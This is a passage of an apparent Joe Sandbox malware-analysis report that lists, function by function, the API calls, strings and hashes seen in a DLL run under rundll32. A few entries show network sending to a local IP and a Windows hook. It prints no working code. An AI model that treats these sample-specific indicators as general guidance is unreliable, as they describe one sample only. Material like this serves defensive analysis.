                                                                                                                      • Associated: 00000009.00000002.505025411.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: LongMenuWindow$AppendSystem
                                                                                                                      • String ID: 192.168.3.85$Message
                                                                                                                      • API String ID: 4121476972-856608562
                                                                                                                      • Opcode ID: 3a485f645eb87c5dda0d91dee484213725162975b6f285bf4b629bdff528d801
                                                                                                                      • Instruction ID: 340d0da2b4c657a0b825359f55c53a9166b08011863532f0c2811cf24d97780a
                                                                                                                      • Opcode Fuzzy Hash: 3a485f645eb87c5dda0d91dee484213725162975b6f285bf4b629bdff528d801
                                                                                                                      • Instruction Fuzzy Hash: F2411B74A4020A9BDB04DB94CCA2FBFB771EF44714F108228F5226F2D2DB75A945CB54
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 10013010 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 108memorynetworkCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 1001E3AC: __EH_prolog3.LIBCMT ref: 1001E3B3
                                                                                                                        • Part of subcall function 1001E3AC: GetWindowTextA.USER32(?,?,?), ref: 1001E3C9
                                                                                                                        • Part of subcall function 1001DDF4: IsWindow.USER32(?), ref: 1001DE03
                                                                                                                      • _DebugHeapAllocator.LIBCPMTD ref: 100130B2
                                                                                                                        • Part of subcall function 10013820: _DebugHeapAllocator.LIBCPMTD ref: 10013875
                                                                                                                      • _strcat.LIBCMT ref: 1001310A
                                                                                                                        • Part of subcall function 100137A0: SendMessageA.USER32 ref: 100137BB
                                                                                                                      • send.WS2_32(?,?,00000064,00000000), ref: 10013195
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504977924.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504971779.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505002368.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505012299.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505019038.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505025411.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: AllocatorDebugHeapWindow$H_prolog3MessageSendText_strcatsend
                                                                                                                      • String ID: :
                                                                                                                      • API String ID: 16450322-3653984579
                                                                                                                      • Opcode ID: 13b8f6eccedc4ccdf4080b13ffaaa0417b73d22118cf8ccc7af144c890aa7e78
                                                                                                                      • Instruction ID: f6b77999ec19404b7b7ce6cfec7bf3295ff1974a42ab232d1976716b8ec2d843
                                                                                                                      • Opcode Fuzzy Hash: 13b8f6eccedc4ccdf4080b13ffaaa0417b73d22118cf8ccc7af144c890aa7e78
                                                                                                                      • Instruction Fuzzy Hash: 01410DB59001189FDB24DB64CC91BEEB775FF44304F5082ADE51AA7282DF346A85CF54
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 1001C1A0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 39libraryloaderCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 10020E5D: EnterCriticalSection.KERNEL32(10057798,?,?,?,?,1002074A,00000010,00000008,1001FA2A,1001F9CD,10015B30,1001555B,?,10015D3C,00000004,10015139), ref: 10020E99
                                                                                                                        • Part of subcall function 10020E5D: InitializeCriticalSection.KERNEL32(?,?,?,?,?,1002074A,00000010,00000008,1001FA2A,1001F9CD,10015B30,1001555B,?,10015D3C,00000004,10015139), ref: 10020EA8
                                                                                                                        • Part of subcall function 10020E5D: LeaveCriticalSection.KERNEL32(10057798,?,?,?,?,1002074A,00000010,00000008,1001FA2A,1001F9CD,10015B30,1001555B,?,10015D3C,00000004,10015139), ref: 10020EB5
                                                                                                                        • Part of subcall function 10020E5D: EnterCriticalSection.KERNEL32(?,?,?,?,?,1002074A,00000010,00000008,1001FA2A,1001F9CD,10015B30,1001555B,?,10015D3C,00000004,10015139), ref: 10020EC1
                                                                                                                        • Part of subcall function 1002072F: __EH_prolog3_catch.LIBCMT ref: 10020736
                                                                                                                        • Part of subcall function 100201F1: __CxxThrowException@8.LIBCMT ref: 10020205
                                                                                                                      • GetProcAddress.KERNEL32(00000000,HtmlHelpA,Function_0001B602,0000000C), ref: 1001C1E4
                                                                                                                      • FreeLibrary.KERNEL32(?), ref: 1001C1F4
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504977924.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504971779.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505002368.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505012299.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505019038.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505025411.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CriticalSection$Enter$AddressException@8FreeH_prolog3_catchInitializeLeaveLibraryProcThrow
                                                                                                                      • String ID: HtmlHelpA$hhctrl.ocx
                                                                                                                      • API String ID: 3274081130-63838506
                                                                                                                      • Opcode ID: c4ff01ed609920668b45cb7a661f9e4cbf771a6b1ff00103ddf750d8f10613a5
                                                                                                                      • Instruction ID: 160066d18b9ed5655b72b10460cb3280c451ea5be833735a295996cf30cd07f4
                                                                                                                      • Opcode Fuzzy Hash: c4ff01ed609920668b45cb7a661f9e4cbf771a6b1ff00103ddf750d8f10613a5
                                                                                                                      • Instruction Fuzzy Hash: AB01F431044706EFE721DFA0AE06F4B7AD5FF04B42F114819F48B98452D770E890AA26
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 1003CB01 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37libraryloaderCOMMONLIBRARYCODE
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetModuleHandleA.KERNEL32(KERNEL32,10033B0B), ref: 1003CB06
                                                                                                                      • GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 1003CB16
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504977924.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504971779.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505002368.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505012299.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505019038.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505025411.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: AddressHandleModuleProc
                                                                                                                      • String ID: IsProcessorFeaturePresent$KERNEL32
                                                                                                                      • API String ID: 1646373207-3105848591
                                                                                                                      • Opcode ID: dc24b012ca1fb4bb896a1dc56100cb90a959cbbb7befe9f8aa549c159bb80eea
                                                                                                                      • Instruction ID: 56947a08a2dfe052dc663468ef672e03bc5ef0643ca607e86d2238c745675855
                                                                                                                      • Opcode Fuzzy Hash: dc24b012ca1fb4bb896a1dc56100cb90a959cbbb7befe9f8aa549c159bb80eea
                                                                                                                      • Instruction Fuzzy Hash: EDF0362090091DE6EF01AFA1AD4969F7A74FB45747F510594E592F0094EF7081B49356
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 100026D0 Relevance: 6.4, APIs: 5, Instructions: 118COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • SetLastError.KERNEL32(0000007F), ref: 100026FF
                                                                                                                      • SetLastError.KERNEL32(0000007F), ref: 1000272B
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504977924.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504971779.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505002368.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505012299.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505019038.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505025411.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: ErrorLast
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1452528299-0
                                                                                                                      • Opcode ID: c9d272d6c554433b4f74cd5ef5cb02bf0863a661864ac41ad17d6d3c26d06b94
                                                                                                                      • Instruction ID: 8e64829365f1e03862022e03b3a1730166a9b8a5af119672a2ae158ec68dc0e1
                                                                                                                      • Opcode Fuzzy Hash: c9d272d6c554433b4f74cd5ef5cb02bf0863a661864ac41ad17d6d3c26d06b94
                                                                                                                      • Instruction Fuzzy Hash: 15511774E0411AEFEB04CF94C980AAEB7F1FF48344F208568E819AB345D774EA41DB91
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 10028638 Relevance: 6.3, APIs: 4, Instructions: 309memoryCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504977924.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504971779.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505002368.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505012299.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505019038.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505025411.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Task$AllocFreeH_prolog3_malloc_memset
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2459298410-0
                                                                                                                      • Opcode ID: 56213c16b803c0e3796c36805e348e495a167a55b28ccf8aaf43ce70b74c7790
                                                                                                                      • Instruction ID: 01fa38cd0bce2764ee9a58647bdb5924a3a29805fe2f500651f730ac49990a2b
                                                                                                                      • Opcode Fuzzy Hash: 56213c16b803c0e3796c36805e348e495a167a55b28ccf8aaf43ce70b74c7790
                                                                                                                      • Instruction Fuzzy Hash: A9C14878601709EFCB14CF68D884AAEB7F5FF88304B648919F856CB291DB71EA41CB50
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 100294E4 Relevance: 6.2, APIs: 4, Instructions: 186COMMONLIBRARYCODE
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504977924.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504971779.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505002368.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505012299.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505019038.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505025411.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: FreeTask$ClearH_prolog3Variant
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 365290523-0
                                                                                                                      • Opcode ID: f4bb32272e54c4630c0f1c2b8213bbcb586b41b40c6f53f6c8fe32820d3a87b6
                                                                                                                      • Instruction ID: 6dfbb0beff937a9ff07d9f1090c18b3058f0abcc9665a1e5acd726f5cd97e7a7
                                                                                                                      • Opcode Fuzzy Hash: f4bb32272e54c4630c0f1c2b8213bbcb586b41b40c6f53f6c8fe32820d3a87b6
                                                                                                                      • Instruction Fuzzy Hash: 6D711775A00A52CFCB60CFA4D9D892AB7F5FF483447A1086DE1469B661CB31EC84CB50
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 1002910E Relevance: 6.2, APIs: 4, Instructions: 173windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504977924.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504971779.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505002368.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505012299.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505019038.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505025411.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$Rect$DesktopVisible
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1055025324-0
                                                                                                                      • Opcode ID: 935237afc4adc895a68147513c1bf8892873bb4cd96f085db3d98f84c1cebb7e
                                                                                                                      • Instruction ID: 30a46d7291c636a93fdcae379f64361bdaca7d323e8f19b7ddc13159497105e4
                                                                                                                      • Opcode Fuzzy Hash: 935237afc4adc895a68147513c1bf8892873bb4cd96f085db3d98f84c1cebb7e
                                                                                                                      • Instruction Fuzzy Hash: 0751E875A0051AEFCB04EFA8DD84CAEB7B9FF48244B614458F515EB255C731EE44CB60
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 1002C6D0 Relevance: 6.1, APIs: 4, Instructions: 132timeCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • _memset.LIBCMT ref: 1002C6E7
                                                                                                                        • Part of subcall function 1001DCEA: _wctomb_s.LIBCMT ref: 1001DCFA
                                                                                                                      • GetFileTime.KERNEL32(?,?,?,?), ref: 1002C71E
                                                                                                                      • GetFileSize.KERNEL32(?,00000000), ref: 1002C733
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504977924.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504971779.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505002368.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505012299.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505019038.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505025411.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: File$SizeTime_memset_wctomb_s
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 26245289-0
                                                                                                                      • Opcode ID: 7b2a999f3c33549589a606ce6b98c8e8e242c4bbabb886e5bb6986c1362b8808
                                                                                                                      • Instruction ID: d07d59a7ff7176791715ff84f3171322556d45097dda904751fff30d64e08997
                                                                                                                      • Opcode Fuzzy Hash: 7b2a999f3c33549589a606ce6b98c8e8e242c4bbabb886e5bb6986c1362b8808
                                                                                                                      • Instruction Fuzzy Hash: 32411B755046199FC724DFA8D981C9AB7F8FF093A07508A2EE5A6D3690E730F944CF50
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 1001E262 Relevance: 6.1, APIs: 4, Instructions: 103windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504977924.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504971779.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505002368.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505012299.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505019038.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505025411.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3850602802-0
                                                                                                                      • Opcode ID: 19518e3b86100b37808dce19ac351571687518489287765c305fecf2a5902a3e
                                                                                                                      • Instruction ID: f22ebcd49f6c4bcf1cb84aabd9b6e0a9805a11e2c96a6edef58545e6592a584a
                                                                                                                      • Opcode Fuzzy Hash: 19518e3b86100b37808dce19ac351571687518489287765c305fecf2a5902a3e
                                                                                                                      • Instruction Fuzzy Hash: 05318F70500259FFDB15DF51C889EAE7BA9EF05790F10806AF90A8F251DA30EEC0DBA0
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 1003E161 Relevance: 6.1, APIs: 4, Instructions: 101COMMONLIBRARYCODE
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 1003E191
                                                                                                                      • __isleadbyte_l.LIBCMT ref: 1003E1C5
                                                                                                                      • MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,A045FF98,?,00000000,00000000,?,00000000,1003E760,?,?,00000002), ref: 1003E1F6
                                                                                                                      • MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,00000001,?,00000000,00000000,?,00000000,1003E760,?,?,00000002), ref: 1003E264
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504977924.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504971779.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505002368.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505012299.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505019038.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505025411.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3058430110-0
                                                                                                                      • Opcode ID: a45d194493aaf76ac1cbb866e4ff6e90a1da533cdec724975968ec5ddac79853
                                                                                                                      • Instruction ID: 9e7ca2975dce83e2c1685c00030f8d0177b945f551d5a1751bafc6038c684fbd
                                                                                                                      • Opcode Fuzzy Hash: a45d194493aaf76ac1cbb866e4ff6e90a1da533cdec724975968ec5ddac79853
                                                                                                                      • Instruction Fuzzy Hash: 23317C31A00296EFDB12CFA4CC849AA7BE9FF05352F168669E8608F1D1D330AD40DB51
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 10026509 Relevance: 6.1, APIs: 4, Instructions: 91COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • __EH_prolog3.LIBCMT ref: 10026510
                                                                                                                        • Part of subcall function 100201F1: __CxxThrowException@8.LIBCMT ref: 10020205
                                                                                                                      • GetDC.USER32(?), ref: 1002658E
                                                                                                                      • IntersectRect.USER32(?,?,?), ref: 100265C8
                                                                                                                      • CreateRectRgnIndirect.GDI32(?), ref: 100265D2
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504977924.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504971779.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505002368.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505012299.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505019038.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505025411.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Rect$CreateException@8H_prolog3IndirectIntersectThrow
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3511876931-0
                                                                                                                      • Opcode ID: 7f6c9fa0e8688ea19043668f2c8dfda2f995fd9ab5cfcbe19950409bb8c584bc
                                                                                                                      • Instruction ID: 5a52d3282697d26d7181906baa499751bc8b7848460d4ff7fbcd99527b494316
                                                                                                                      • Opcode Fuzzy Hash: 7f6c9fa0e8688ea19043668f2c8dfda2f995fd9ab5cfcbe19950409bb8c584bc
                                                                                                                      • Instruction Fuzzy Hash: 71315D71D0062ADFCF01CFA4C989ADEBBB5FF08300F614459F915AB155D774AA81CBA1
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 100211EE Relevance: 6.1, APIs: 4, Instructions: 88COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504977924.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504971779.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505002368.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505012299.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505019038.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505025411.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: __msize_malloc
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1288803200-0
                                                                                                                      • Opcode ID: 172559e824c18d3cfeedd4486189817d6fbc1f914f9a457cc390fc68d8836e76
                                                                                                                      • Instruction ID: b47b26af396fa43851c5e16859074de777cbaf7baa699ca6a99f78ce61545289
                                                                                                                      • Opcode Fuzzy Hash: 172559e824c18d3cfeedd4486189817d6fbc1f914f9a457cc390fc68d8836e76
                                                                                                                      • Instruction Fuzzy Hash: 0921C138100210DFCB59DF64F881AEE77D5EF20690B908629F858CA246DB34ECA4CB80
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 1002EB37 Relevance: 6.1, APIs: 4, Instructions: 85windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • __EH_prolog3.LIBCMT ref: 1002EB3E
                                                                                                                      • PeekMessageA.USER32(00000001,00000000,00000200,00000209,00000003), ref: 1002EB98
                                                                                                                      • PeekMessageA.USER32(00000001,00000000,00000100,00000109,00000003), ref: 1002EBAF
                                                                                                                      • PeekMessageA.USER32(?,00000000,00000000,00000000,00000002), ref: 1002EBE9
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504977924.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504971779.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505002368.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505012299.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505019038.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505025411.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: MessagePeek$H_prolog3
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3998274959-0
                                                                                                                      • Opcode ID: 2a490924581eee8776ba6e67445ffafdb54cb4693ed265a3166e0c844ddbb0bc
                                                                                                                      • Instruction ID: 2a88a428d7565fcf36a03eeacbe685c714d47f328614f3543ed6f1450f80f22a
                                                                                                                      • Opcode Fuzzy Hash: 2a490924581eee8776ba6e67445ffafdb54cb4693ed265a3166e0c844ddbb0bc
                                                                                                                      • Instruction Fuzzy Hash: BE317871A4039AAFDB21DFA4ED85EAE73E8FF04350F51091AB652AA1C1D770AE40CB10
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 100160A8 Relevance: 6.1, APIs: 4, Instructions: 76synchronizationCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • __EH_prolog3_catch.LIBCMT ref: 100160AF
                                                                                                                        • Part of subcall function 10015F7F: GetCurrentThreadId.KERNEL32 ref: 10015F92
                                                                                                                        • Part of subcall function 10015F7F: SetWindowsHookExA.USER32(000000FF,Function_00015DEB,00000000,00000000), ref: 10015FA2
                                                                                                                      • SetEvent.KERNEL32(?,00000060), ref: 1001615C
                                                                                                                      • WaitForSingleObject.KERNEL32(?,000000FF), ref: 10016165
                                                                                                                      • CloseHandle.KERNEL32(?), ref: 1001616C
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504977924.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504971779.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
